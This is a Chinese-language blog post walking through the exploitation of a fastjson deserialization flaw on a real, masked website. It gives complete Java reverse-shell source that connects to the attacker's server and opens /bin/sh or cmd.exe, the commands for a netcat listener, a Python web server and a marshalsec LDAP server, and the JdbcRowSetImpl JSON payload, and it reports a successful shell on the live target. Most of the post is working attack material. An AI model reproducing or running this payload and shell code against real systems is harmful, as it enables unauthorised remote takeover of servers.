fastjson反序列化漏洞实际案例利用

时间:2022-07-31 19:55:14

  fastjson反序列化rce实际案例利用全过程:

  存在问题网站:http://***.com/

  在网站上寻找一些安全漏洞的时候,发现一条json数据包

  数据包如下:

    

POST /*** HTTP/1.1

Host: ***

Connection: close

Content-Length: 100

Accept: application/json, text/plain, */*

Content-Type: application/json;charset=UTF-8

Referer: *

Accept-Language: zh-CN,zh;q=0.9

Cookie: *

{"***":"***"}

  当我尝试输入:'a

    

POST /*** HTTP/1.1

Host: ***

Connection: close

Content-Length: 100

Accept: application/json, text/plain, */*

Content-Type: application/json;charset=UTF-8

Referer: *

Accept-Language: zh-CN,zh;q=0.9

Cookie: *

{"***":"***'a"}

  发生了报错,报错信息:

  {"timestamp":1556677012822,"status":500,"error":"Internal Server Error","exception":"com.****.fastjson.JSONException.....}

  fastjson,立马想到fastjson反序列化漏洞。

  关于利用:需要两份文件

  1.reverse.java

  2.marshalsec-0.0.1-SNAPSHOT-all.jar

  提供reverse.java的代码:

  

import java.io.BufferedReader;

import java.io.BufferedWriter;

import java.io.InputStream;

import java.io.InputStreamReader;

import java.io.OutputStream;

import java.io.OutputStreamWriter;

import java.net.Socket;

public class reverse {

    class StreamConnector

      extends Thread

    {

      InputStream hx;

      OutputStream il;

      StreamConnector(InputStream hx, OutputStream il)

      {

        this.hx = hx;

        this.il = il;

      }

      public void run()

      {

        BufferedReader ar = null;

        BufferedWriter slm = null;

        try

        {

          ar = new BufferedReader(new InputStreamReader(this.hx));

          slm = new BufferedWriter(new OutputStreamWriter(this.il));

          char[] buffer = new char[8192];

          int length;

          while ((length = ar.read(buffer, 0, buffer.length)) > 0)

          {

            slm.write(buffer, 0, length);

            slm.flush();

          }

        }

        catch (Exception localException) {}

        try

        {

          if (ar != null) {

            ar.close();

          }

          if (slm != null) {

            slm.close();

          }

        }

        catch (Exception localException1) {}

      }

    }

    public reverse()

      {

        reverseConn("服务器ip:端口号");

      }

     public static void main(String[] args)

    {

        System.out.println("0");

    }

      public void reverseConn(String ip)

      {

        String ipport = ip;

        try

        {

          String ShellPath;

          if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {

            ShellPath = new String("/bin/sh");

          } else {

            ShellPath = new String("cmd.exe");

          }

          Socket socket = new Socket(ipport.split(":")[0],

            Integer.parseInt(ipport.split(":")[1]));

          Process process = Runtime.getRuntime().exec(ShellPath);

          new StreamConnector(process.getInputStream(),

            socket.getOutputStream()).start();

          new StreamConnector(process.getErrorStream(),

            socket.getOutputStream()).start();

          new StreamConnector(socket.getInputStream(),

            process.getOutputStream()).start();

        }

        catch (Exception e)

        {

          e.printStackTrace();

        }

      }

}

  marshalsec-0.0.1-SNAPSHOT-all.jar网上可自行找到。

  测试服务器:阿里云服务器(CenterOS)

  需要具备的环境:1.jdk 1.8环境   2.apache服务 3.无apache自带python启动web服务

  jdk1.8安装参考:https://blog.51cto.com/kmt1994/2325949?source=dra

  apache服务配置嫌麻烦直接使用:  python -m SimpleHTTPServer 8000(以8000端口为例子),如果配置了apache访问是默认80端口

  访问http://服务器ip:8000 or http://服务器ip:80

  没apache(web)服务的操作过程如下:

  把reverse.java和marshalsec-0.0.1-SNAPSHOT-all.jar放到网站根目录下:

  操作1: javac reverse.java 生成reverse.class

  操作2: python -m SimpleHTTPServer 8000开启一个8000端口的web服务

  操作3: 新建窗口:nc -lvvp 1234   *监听的端口根据reverse.java中的端口进行配置互相匹配

  操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:8000/#reverse  10086

  操作5:构造数据包:

  

POST /*** HTTP/1.1

Host: ***

Connection: close

Content-Length: 100

Accept: application/json, text/plain, */*

Content-Type: application/json;charset=UTF-8

Referer: *

Accept-Language: zh-CN,zh;q=0.9

Cookie: *

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

  发送数据包产生了一定延迟,查看操作3的窗口发现:

  反弹shell成功

  fastjson反序列化漏洞实际案例利用

  如果有apache服务,那么操作如下:

  操作1.在网站根目录下存放那两个文件,我的网站根目录/var/www/html

  操作2.javac reverse.java 生成reverse.class

  操作3.新建窗口:nc -lvvp 1234   *监听的端口根据reverse.java中的端口进行配置互相匹配  

  操作4:新建窗口:java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://服务器ip:80/#reverse  10086 *(apache服务端口默认80)

  操作5:构造数据包:

    

POST /*** HTTP/1.1

Host: ***

Connection: close

Content-Length: 100

Accept: application/json, text/plain, */*

Content-Type: application/json;charset=UTF-8

Referer: *

Accept-Language: zh-CN,zh;q=0.9

Cookie: *

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://服务器ip:10086/Object","autoCommit":true}

  发包产生延迟,然后查看操作3窗口:

  成功反弹shell

  fastjson反序列化漏洞实际案例利用

  关于坑:要在网站根目录下进行这些命令操作!

    

p.p1 { margin: 0; font: 13px "Helvetica Neue"; color: rgba(0, 0, 0, 1) }
p.p1 { margin: 0; font: 13px "Helvetica Neue"; color: rgba(0, 0, 0, 1) }
p.p1 { margin: 0; font: 13px "Helvetica Neue"; color: rgba(0, 0, 0, 1) }
span.s1 { color: rgba(0, 162, 255, 1) }

相关文章